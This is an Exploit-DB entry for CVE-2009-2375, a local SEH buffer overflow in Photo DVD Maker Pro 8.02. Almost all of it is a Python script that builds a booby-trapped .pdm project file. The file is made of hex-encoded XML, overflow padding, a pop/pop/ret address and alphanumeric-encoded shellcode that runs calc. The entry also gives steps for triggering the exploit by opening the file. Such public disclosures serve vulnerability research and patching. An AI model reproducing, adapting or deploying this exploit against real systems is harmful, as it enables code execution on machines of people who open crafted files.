Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)

EDB-ID:

9104

CVE:

2009-2375

EDB Verified:

Author:

His0k4

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2009-07-10

Vulnerable App: 
# _  _   _         __    _     _ _  
#| || | (_)  ___  /  \  | |__ | | | 
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  \__/  |_\_\   |_| 
#
#[+] Bug : Photo DVD Maker (.pdm) Local Buffer Overflow Exploit (SEH)
#[+] Refer : Secunia advisory 35709
#[+] Exploit : His0k4
#[+] Tested on : Windows XP (SP3)

#[+] Description: The program filters some chars i haven't tried to list them...
#		  So i decided directly to use the alpha2 tool

#[+] Note : After generating the project file,convert it to UTF-8 without BOM and save
#[+] Note2 : You have to open the exploit file from the program(file>open)


header1 =  "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20"
header1 += "\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a"
header1 += "\x3c\x50\x68\x6f\x74\x6f\x5f\x44\x56\x44\x5f\x4d\x61\x6b\x65\x72\x5f\x50\x72\x6f"
header1 += "\x6a\x65\x63\x74\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x37\x2e\x30\x30\x22\x20"
header1 += "\x61\x6c\x62\x75\x6d\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31\x22\x20\x74\x68\x75\x6d"
header1 += "\x62\x6e\x61\x69\x6c\x5f\x73\x69\x7a\x65\x3d\x22\x38\x30\x22\x20\x61\x6c\x62\x75"
header1 += "\x6d\x5f\x66\x69\x6c\x65\x5f\x74\x69\x6d\x65\x5f\x73\x74\x61\x6d\x70\x3d\x22\x30"
header1 += "\x22\x20\x64\x69\x73\x6b\x5f\x66\x6f\x72\x6d\x61\x74\x3d\x22\x30\x22\x3e\x0a\x20"
header1 += "\x20\x20\x20\x3c\x54\x65\x6d\x70\x5f\x46\x69\x6c\x65\x5f\x50\x61\x74\x68\x3e\x43"
header1 += "\x3a\x5c\x44\x6f\x63\x75\x6d\x65\x6e\x74\x73\x20\x61\x6e\x64\x20\x53\x65\x74\x74"
header1 += "\x69\x6e\x67\x73\x5c\x76\x69\x63\x74\x69\x6d\x5c\x4d\x79\x20\x44\x6f\x63\x75\x6d"
header1 += "\x65\x6e\x74\x73\x5c\x50\x68\x6f\x74\x6f\x20\x44\x56\x44\x20\x4d\x61\x6b\x65\x72"
header1 += "\x5c\x30\x39\x30\x37\x30\x36\x31\x31\x33\x36\x32\x37\x3c\x2f\x54\x65\x6d\x70\x5f"
header1 += "\x46\x69\x6c\x65\x5f\x50\x61\x74\x68\x3e\x0a\x20\x20\x20\x20\x3c\x44\x56\x44\x5f"
header1 += "\x4d\x65\x6e\x75\x20\x62\x6b\x5f\x6d\x75\x73\x69\x63\x5f\x63\x6f\x75\x6e\x74\x3d"
header1 += "\x22\x31\x22\x20\x62\x6b\x5f\x69\x6d\x61\x67\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22"
header1 += "\x30\x22\x20\x65\x6e\x63\x6f\x64\x65\x5f\x64\x69\x72\x74\x79\x3d\x22\x31\x22\x3e"
header1 += "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4d\x65\x6e\x75\x5f\x54\x65\x6d\x70\x6c"
header1 += "\x61\x74\x65\x3e\x36\x34\x58\x6d\x61\x73\x2e\x78\x6d\x6c\x3c\x2f\x4d\x65\x6e\x75"
header1 += "\x5f\x54\x65\x6d\x70\x6c\x61\x74\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c"
header1 += "\x4d\x65\x6e\x75\x5f\x54\x69\x74\x6c\x65\x20\x69\x6e\x69\x74\x61\x6c\x69\x7a\x65"
header1 += "\x64\x3d\x22\x30\x22\x20\x66\x6f\x6e\x74\x3d\x22\x43\x61\x74\x61\x6e\x65\x6f\x20"
header1 += "\x42\x54\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x66\x66\x22"
header1 += "\x20\x73\x69\x7a\x65\x3d\x22\x33\x38\x22\x20\x62\x6f\x6c\x64\x3d\x22\x30\x22\x20"
header1 += "\x69\x74\x61\x6c\x69\x63\x3d\x22\x30\x22\x20\x75\x6e\x64\x65\x72\x6c\x69\x6e\x65"
header1 += "\x3d\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x30\x31\x22\x20\x68\x65\x69"
header1 += "\x67\x68\x74\x3d\x22\x34\x35\x22\x20\x61\x6c\x69\x67\x6e\x3d\x22\x30\x22\x20\x73"
header1 += "\x68\x61\x64\x6f\x77\x3d\x22\x31\x22\x20\x73\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30"
header1 += "\x78\x30\x65\x30\x61\x39\x64\x22\x20\x73\x5f\x73\x69\x7a\x65\x3d\x22\x32\x22\x20"
header1 += "\x78\x30\x3d\x22\x36\x30\x22\x20\x79\x30\x3d\x22\x37\x35\x22\x3e\x4d\x79\x20\x50"
header1 += "\x68\x6f\x74\x6f\x20\x41\x6c\x62\x75\x6d\x3c\x2f\x4d\x65\x6e\x75\x5f\x54\x69\x74"
header1 += "\x6c\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x42\x61\x63\x6b\x67\x72\x6f"
header1 += "\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x20\x69\x64\x3d\x22\x30\x22\x3e\x43\x3a\x5c"
header1 += "\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x50\x68\x6f\x74\x6f\x20"
header1 += "\x44\x56\x44\x20\x4d\x61\x6b\x65\x72\x20\x50\x72\x6f\x66\x65\x73\x73\x69\x6f\x6e"
header1 += "\x61\x6c\x5c\x6d\x75\x73\x69\x63\x5c\x64\x65\x66\x61\x75\x6c\x74\x2e\x6d\x70\x33"
header1 += "\x3c\x2f\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x3e\x0a"
header1 += "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x63\x6f\x64\x65\x5f\x49\x6e\x66\x6f"
header1 += "\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x44\x56\x44\x5f\x4d\x65\x6e\x75\x3e\x0a\x20"
header1 += "\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x44\x61\x74\x61\x20\x64\x65\x6c"
header1 += "\x65\x74\x65\x5f\x74\x65\x6d\x70\x6c\x61\x74\x65\x5f\x66\x69\x6c\x65\x3d\x22\x31"
header1 += "\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f"
header1 += "\x44\x69\x73\x6b\x4d\x65\x6e\x75\x5f\x44\x61\x74\x61\x20\x67\x72\x61\x79\x5f\x73"
header1 += "\x63\x61\x6c\x65\x3d\x22\x30\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f\x6d\x65\x6e"
header1 += "\x75\x5f\x74\x69\x74\x6c\x65\x3d\x22\x31\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f"
header1 += "\x61\x6c\x62\x75\x6d\x5f\x74\x69\x74\x6c\x65\x3d\x22\x31\x22\x20\x76\x69\x73\x69"
header1 += "\x62\x6c\x65\x5f\x61\x6c\x62\x75\x6d\x5f\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x20"
header1 += "\x76\x69\x73\x69\x62\x6c\x65\x5f\x61\x6c\x62\x75\x6d\x5f\x74\x68\x75\x6d\x62\x6e"
header1 += "\x61\x69\x6c\x3d\x22\x31\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f\x70\x61\x67\x65"
header1 += "\x5f\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x20\x62\x46\x69\x78\x65\x64\x44\x75\x72"
header1 += "\x61\x74\x69\x6f\x6e\x3d\x22\x31\x22\x20\x64\x77\x44\x56\x44\x4d\x65\x6e\x75\x44"
header1 += "\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x34\x30\x22\x20\x75\x73\x65\x5f\x64\x76\x64"
header1 += "\x5f\x6d\x65\x6e\x75\x3d\x22\x31\x22\x20\x70\x6c\x61\x79\x5f\x6d\x6f\x64\x65\x3d"
header1 += "\x22\x32\x22\x20\x70\x6c\x61\x79\x5f\x73\x6c\x69\x64\x65\x73\x68\x6f\x77\x5f\x61"
header1 += "\x66\x74\x65\x72\x5f\x70\x6c\x61\x79\x69\x6e\x67\x5f\x6d\x65\x6e\x75\x3d\x22\x31"
header1 += "\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73"
header1 += "\x5f\x55\x44\x46\x5f\x44\x61\x74\x61\x20\x6a\x6f\x6c\x69\x65\x74\x3d\x22\x31\x22"
header1 += "\x20\x73\x61\x76\x65\x5f\x6f\x72\x69\x67\x69\x6e\x61\x6c\x5f\x66\x69\x6c\x65\x73"
header1 += "\x3d\x22\x30\x22\x20\x73\x61\x76\x65\x5f\x65\x78\x74\x72\x61\x5f\x66\x69\x6c\x65"
header1 += "\x73\x3d\x22\x30\x22\x20\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x3d\x22\x43\x6f\x70"
header1 += "\x79\x72\x69\x67\x68\x74\x28\x63\x29\x20\x76\x69\x63\x74\x69\x6d\x22\x20\x70\x75"
header1 += "\x62\x6c\x69\x73\x68\x65\x72\x3d\x22\x76\x69\x63\x74\x69\x6d\x22\x20\x76\x6f\x6c"
header1 += "\x75\x6d\x65\x6c\x61\x62\x65\x6c\x3d\x22\x50\x68\x6f\x74\x6f\x20\x41\x6c\x62\x75"
header1 += "\x6d\x20\x6f\x66\x20\x76\x69\x63\x74\x69\x6d\x22\x3e\x0a\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x20\x20\x20\x3c\x4f\x50\x54\x5f\x45\x78\x74\x72\x61\x46\x69\x6c\x65"
header1 += "\x73\x20\x66\x69\x6c\x65\x73\x3d\x22\x30\x22\x20\x66\x6f\x6c\x64\x65\x72\x3d\x22"
header1 += "\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x4f\x50\x54"
header1 += "\x5f\x45\x78\x74\x72\x61\x46\x69\x6c\x65\x73\x3e\x0a\x20\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x55\x44\x46\x5f\x44\x61\x74\x61\x3e"
header1 += "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x54\x56"
header1 += "\x5f\x44\x61\x74\x61\x20\x70\x61\x6c\x3d\x22\x30\x22\x20\x63\x6f\x72\x72\x65\x63"
header1 += "\x74\x69\x6f\x6e\x3d\x22\x31\x22\x20\x63\x72\x6f\x70\x3d\x22\x35\x22\x20\x63\x72"
header1 += "\x6f\x70\x5f\x65\x6e\x61\x62\x6c\x65\x3d\x22\x30\x22\x20\x61\x6e\x74\x69\x66\x6c"
header1 += "\x69\x63\x6b\x3d\x22\x31\x22\x20\x70\x68\x6f\x74\x6f\x5f\x73\x63\x61\x6c\x65\x5f"
header1 += "\x6d\x6f\x64\x65\x3d\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c"
header1 += "\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x52\x65\x63\x6f\x72\x64\x65\x72\x5f\x44\x61\x74"
header1 += "\x61\x20\x65\x6e\x61\x62\x6c\x65\x5f\x62\x75\x72\x6e\x5f\x70\x72\x6f\x6f\x66\x3d"
header1 += "\x22\x31\x22\x20\x6f\x75\x74\x70\x75\x74\x5f\x62\x75\x72\x6e\x5f\x64\x76\x64\x3d"
header1 += "\x22\x31\x22\x20\x6f\x75\x74\x70\x75\x74\x5f\x64\x69\x73\x63\x5f\x69\x6d\x61\x67"
header1 += "\x65\x3d\x22\x30\x22\x20\x73\x68\x75\x74\x64\x6f\x77\x6e\x3d\x22\x30\x22\x20\x69"
header1 += "\x73\x6f\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x3d\x22\x22\x20\x63\x6f\x70\x69"
header1 += "\x65\x73\x3d\x22\x31\x22\x20\x64\x72\x69\x76\x65\x72\x5f\x6d\x6f\x64\x65\x3d\x22"
header1 += "\x30\x22\x20\x63\x64\x5f\x77\x72\x69\x74\x69\x6e\x67\x5f\x6d\x6f\x64\x65\x3d\x22"
header1 += "\x30\x22\x20\x73\x69\x6d\x75\x6c\x61\x74\x65\x5f\x77\x72\x69\x74\x69\x6e\x67\x3d"
header1 += "\x22\x31\x22\x20\x73\x70\x65\x65\x64\x3d\x22\x2d\x31\x22\x2f\x3e\x0a\x20\x20\x20"
header1 += "\x20\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x44\x61\x74\x61\x3e\x0a\x20\x20\x20"
header1 += "\x20\x3c\x41\x6c\x62\x75\x6d\x5f\x44\x61\x74\x61\x20\x69\x64\x3d\x22\x30\x22\x20"
header1 += "\x74\x79\x70\x65\x3d\x22\x73\x74\x69\x6c\x6c\x69\x6d\x61\x67\x65\x22\x20\x6e\x61"
header1 += "\x6d\x65\x3d\x22\x22\x20\x69\x6d\x61\x67\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31"
header1 += "\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x5f\x6f\x6e\x65\x3d\x22\x32\x22"
header1 += "\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x5f\x74\x77\x6f\x3d\x22\x32\x22\x20"
header1 += "\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x79\x70\x65\x3d\x22\x30\x22\x20\x62\x6b"
header1 += "\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x30\x30\x22\x20\x61\x75"
header1 += "\x74\x6f\x5f\x70\x61\x6e\x5f\x7a\x6f\x6f\x6d\x3d\x22\x31\x22\x20\x6d\x75\x73\x69"
header1 += "\x63\x5f\x66\x61\x64\x65\x5f\x69\x6e\x5f\x6f\x75\x74\x3d\x22\x31\x22\x20\x62\x6b"
header1 += "\x5f\x6d\x75\x73\x69\x63\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31\x22\x20\x73\x70\x72"
header1 += "\x69\x74\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x30\x22\x20\x65\x6e\x63\x6f\x64\x65"
header1 += "\x5f\x64\x69\x72\x74\x79\x3d\x22\x31\x22\x20\x70\x6c\x61\x79\x5f\x6f\x76\x65\x72"
header1 += "\x5f\x63\x75\x72\x72\x65\x6e\x74\x5f\x73\x6f\x6e\x67\x3d\x22\x30\x22\x20\x74\x72"
header1 += "\x61\x6e\x73\x69\x74\x69\x6f\x6e\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x30\x22\x20\x6e"
header1 += "\x6f\x6e\x65\x5f\x74\x72\x61\x6e\x73\x3d\x22\x30\x22\x3e\x0a\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x3c\x41\x6c\x62\x75\x6d\x5f\x54\x68\x65\x6d\x65\x20\x6e\x61\x6d\x65"
header1 += "\x3d\x22\x5f\x6e\x6f\x5f\x74\x68\x65\x6d\x65\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x3c\x54\x68\x65\x6d\x65\x5f\x54\x69\x74\x6c\x65\x20\x45\x6e\x61\x62"
header1 += "\x6c\x65\x64\x3d\x22\x30\x22\x20\x73\x74\x72\x69\x6e\x67\x3d\x22\x22\x20\x63\x6f"
header1 += "\x6c\x6f\x72\x3d\x22\x33\x39\x34\x30\x36\x22\x20\x62\x6b\x5f\x63\x6f\x6c\x6f\x72"
header1 += "\x3d\x22\x30\x22\x20\x73\x69\x7a\x65\x3d\x22\x34\x38\x22\x20\x45\x66\x66\x65\x63"
header1 += "\x74\x3d\x22\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x30\x22\x2f\x3e\x0a"
header1 += "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x54\x68\x65\x6d\x65\x5f\x43\x72\x65\x64\x69"
header1 += "\x74\x20\x45\x6e\x61\x62\x6c\x65\x64\x3d\x22\x30\x22\x20\x73\x74\x72\x69\x6e\x67"
header1 += "\x3d\x22\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x33\x39\x34\x30\x36\x22\x20\x62\x6b"
header1 += "\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x22\x20\x73\x69\x7a\x65\x3d\x22\x34\x38\x22"
header1 += "\x20\x45\x66\x66\x65\x63\x74\x3d\x22\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d"
header1 += "\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x63\x6f\x64"
header1 += "\x65\x5f\x46\x69\x6c\x65\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x41\x6c"
header1 += "\x62\x75\x6d\x5f\x49\x6d\x61\x67\x65\x20\x69\x64\x3d\x22\x30\x22\x3e\x5a\x3a\x5c"
header1 += "\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x2e\x4a\x50\x47\x3c\x2f\x41\x6c\x62\x75\x6d"
header1 += "\x5f\x49\x6d\x61\x67\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x42\x61\x63"
header1 += "\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x20\x69\x64\x3d\x22\x30\x22"
header1 += "\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x34\x30\x30\x30\x30\x22\x20\x73\x74"
header1 += "\x61\x72\x74\x3d\x22\x30\x22\x20\x65\x6e\x64\x3d\x22\x34\x30\x30\x30\x30\x22\x20"
header1 += "\x6f\x66\x66\x73\x65\x74\x5f\x69\x6e\x5f\x74\x72\x61\x63\x6b\x3d\x22\x30\x22\x3e"
header1 += "\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x50\x68\x6f"
header1 += "\x74\x6f\x20\x44\x56\x44\x20\x4d\x61\x6b\x65\x72\x20\x50\x72\x6f\x66\x65\x73\x73"
header1 += "\x69\x6f\x6e\x61\x6c\x5c\x6d\x75\x73\x69\x63\x5c\x64\x65\x66\x61\x75\x6c\x74\x2e"
header1 += "\x6d\x70\x33\x3c\x2f\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69"
header1 += "\x63\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4d\x65\x6e\x75\x5f\x54\x65\x78"
header1 += "\x74\x20\x69\x6e\x69\x74\x61\x6c\x69\x7a\x65\x64\x3d\x22\x30\x22\x20\x66\x6f\x6e"
header1 += "\x74\x3d\x22\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x30\x30"
header1 += "\x22\x20\x73\x69\x7a\x65\x3d\x22\x30\x22\x20\x62\x6f\x6c\x64\x3d\x22\x30\x22\x20"
header1 += "\x69\x74\x61\x6c\x69\x63\x3d\x22\x30\x22\x20\x75\x6e\x64\x65\x72\x6c\x69\x6e\x65"
header1 += "\x3d\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x30\x22\x20\x68\x65\x69\x67\x68"
header1 += "\x74\x3d\x22\x30\x22\x20\x61\x6c\x69\x67\x6e\x3d\x22\x30\x22\x20\x73\x68\x61\x64"
header1 += "\x6f\x77\x3d\x22\x30\x22\x20\x73\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30"
header1 += "\x30\x30\x30\x30\x22\x20\x73\x5f\x73\x69\x7a\x65\x3d\x22\x30\x22\x20\x78\x30\x3d"
header1 += "\x22\x30\x22\x20\x79\x30\x3d\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x3c\x53\x75\x62\x74\x69\x74\x6c\x65\x5f\x46\x6f\x6e\x74\x20\x66\x69\x6c\x65"
header1 += "\x3d\x22\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x46\x6f\x6e\x74\x73\x5c\x61"
header1 += "\x72\x69\x61\x6c\x2e\x74\x74\x66\x22\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x22\x69"
header1 += "\x73\x6f\x2d\x38\x38\x35\x39\x2d\x31\x22\x20\x73\x69\x7a\x65\x3d\x22\x33\x32\x22"
header1 += "\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6d\x61\x67\x65\x5f\x44\x61"
header1 += "\x74\x61\x20\x69\x64\x3d\x22\x30\x22\x20\x61\x6e\x67\x6c\x65\x3d\x22\x30\x22\x20"
header1 += "\x74\x72\x61\x6e\x73\x3d\x22\x42\x6f\x78\x20\x57\x69\x70\x65\x20\x2d\x20\x54\x2e"
header1 += "\x20\x74\x6f\x20\x4c\x2e\x5b\x54\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x4c\x69\x62"
header1 += "\x5d\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x46\x69\x6c"
header1 += "\x65\x5f\x4e\x61\x6d\x65\x3e\x43\x3a\x5c"

header2 = "\x2e\x4a\x50\x47\x3c\x2f\x46\x69\x6c\x65\x5f\x4e\x61\x6d\x65\x3e\x0a\x20\x20\x20"
header2 += "\x20\x20\x20\x20\x20\x3c\x2f\x49\x6d\x61\x67\x65\x5f\x44\x61\x74\x61\x3e\x0a\x20"
header2 += "\x20\x20\x20\x3c\x2f\x41\x6c\x62\x75\x6d\x5f\x44\x61\x74\x61\x3e\x0a\x3c\x2f\x50"
header2 += "\x68\x6f\x74\x6f\x5f\x44\x56\x44\x5f\x4d\x61\x6b\x65\x72\x5f\x50\x72\x6f\x6a\x65"
header2 += "\x63\x74\x3e"

payload =  header1
payload += "\x41"*257
#align esp
payload += "\x61"*4 #popad
payload += "\x56\x29\xD1\x72" # printable p/p/r msacm32.drv (xp/sp3)
payload += "\x21"    #making a "Not taken jump"
payload += "\x61"*39 #popad
payload += "\x4C"*4  #dec esp
payload += "\x41"*4  #padding

#win32_exec calc -encoded with alpha2 zero tolerance => 741 bytes
payload += (
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIzK7sciJKd"
"EYxzXIoKOio0OPIRiqY2ig9syRq0ZsfSdQHvVVStp66Rxp4cqFPRbP6pHbhTp"
"QRTs6PpB2cpVRxwBsr2d721XgDra7BQQqTdpw1pDbtqRStrq724p1QStRaqFP"
"Xp4qJ7HSrRdszpOpM0NPO3zpNaVV4QRRpw2P0crTppKG8QUw4pN3spK5hbnqW"
"Suv00J1GrapPpOpNrkfXRoSdPJpQ2kgHPOPUpBpRaQvPPKbnsyWDpKDxSvecp"
"KW8g12p0PrnraaSw2pLRipIPNszaVpXaRPLW6QGqWp0SqpLPL2lrmrpcq4p74"
"RlRkbnrf0O2kTsQVduRfRbW6fPsu5g3uPN0KsxroSusv3bW1bpPKrn1XVVBkV"
"XpNRpbkQDBkQX2opEpNPQ1Qf0PKpNRkcxpNtq0KbxQQtppKbnrirxrnpUW6f2"
"sv0P1Sblg163g2PLQV4vpKsh1RPTQRBs0Eg8srpLPJRwrnPPPKPHsrw4PNFP2"
"kpXW2pWPNRqRmQZ0KRhpJrfrjbp0Krn3ytppKRhPBuhCr0KpBPP1R60srrpBk"
"UhPJQV0N5cPO4uqQp3QXroqR2fQXsuPIQXqZRoSs7H2b0L2k0WQRSuRj6VBbp"
"ORltxcvp0BoSepJqFqZtybppOpLPXRpPP2gruropOw7Bn1SrvraRfpNBvQS0V"
"crpPsjTJA")
payload += header2

try:
    out_file = open("exploit.pdm","w")
    out_file.write(payload)
    out_file.close()
    print("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-07-10]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services